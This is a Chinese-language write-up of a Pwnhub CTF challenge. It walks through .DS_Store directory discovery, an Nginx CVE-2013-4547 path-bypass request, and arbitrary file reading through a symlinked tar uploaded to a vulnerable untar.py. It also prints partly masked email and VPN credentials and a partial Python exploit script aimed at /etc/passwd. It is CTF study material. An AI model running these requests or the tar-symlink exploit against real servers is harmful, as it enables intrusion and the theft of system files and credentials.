PWNHUB / 2013 那年 Writeup

0x00 题目介绍

详情

题目地址:54.223.177.152:80

更新

  • 2017.10.03 17:50:16搞 Discuz 不是目的,谁说鸡肋就没用,看 Discuz 送助攻
  • 2017.10.03 11:24:40想办法把它变成任意文件读取,但 Flag 不在这儿 ,当作一次真实渗透玩吧!
  • 2017.10.02 15:45:49Nginx 虽然有过很多问题,但是它是个好 server

0x01 Nginx

各种坑,最好

扫目录发现http://54.223.177.152/.DS_Store

  • index.html
  • upload[0x20]
  • index.php
  • admin
  • includes
  • config
  • pwnhub

CVE-2013-4547

GET /upload /../pwnhub/index.html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
  </head>
  <body>
    <a href="../6c58c8751bca32b9943b34d0ff29bc16/index.php">get</a>
  </body>
</html>

0x02 Upload

再来一波http://54.223.177.152/6c58c8751bca32b9943b34d0ff29bc16/.DS_Store

发现untar.py

import tarfile
import sys
import uuid
import os


def untar(filename):
    os.chdir('/tmp/pwnhub/')
    t = tarfile.open(filename, 'r')
    for i in t.getnames():
        if '..' in i or '.cfg' != os.path.splitext(i)[1]:
            return 'error'
        else:
            try:
                t.extract(i, '/tmp/pwnhub/')
            except Exception, e:
                return e
            else:
                cfgName = str(uuid.uuid1()) + '.cfg'
                os.rename(i, cfgName)
                return cfgName

if __name__ == '__main__':
    filename = sys.argv[1]
    if not tarfile.is_tarfile(filename):
        exit('error')
    else:
        print untar(filename)

构造存在软连接文件的tar就可以任意读文件了

0x03 VPN

/proc/mounts
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/cron_run.sh
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/run
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/mail_send.py

Email infomation:

mail_user = 'ctf_dicha@21cn.com'
mail_pass = '634DRaC62______'

VPN infomation:

Server IP: 54.223.177.152
IPsec PSK: dkQ97gGQPuVm83______
Username: pwnhub
Password: LE3U2aTgc4DGZd______

学校的网有毒。。。

0x04 End

最后反正是没做出来,

内网渗透什么的、经验不够啊

看了大佬们的WP才知道、要去扫docker默认网段

C014 Pwnhub_2013那年.pdf

MARK
docker启动时默认使用172.17.x.x作为容器的ip地址

0x05 Exp Script

#!/usr/bin/env python2
# coding=utf-8

import os
import sys
import re
import requests as req
import urllib2
from tar_archive_with_symboliclink import _tarfile


URL = 'http://54.223.177.152/6c58c8751bca32b9943b34d0ff29bc16/index.php'

HEADERS = {
    'Origin': 'http://54.223.177.152',
    'User-Agent': 'Mozilla/5.0 AppleWebKit/537.75.14 (KHTML, like Gecko) Safari'
}

def exp_1():
    _req = urllib2.Request(
        'http://54.223.177.152/upload\x20/../pwnhub/index.html')
    res = urllib2.urlopen(_req)
    print res.read()
    res.close()

def exp_2(fn=b'v.cfg', ln=b'/etc/passwd'):
    fd = _tarfile(fn, b'', ln)
    res = upload_file('v.tar', fd)
    if res:
        m = re.findall(
            r'<textarea cols="30" rows="15">(.*)</textarea>', res, re.M | re.S)
        if m:
            return m[0]
        else:
            return res
    else:
        return False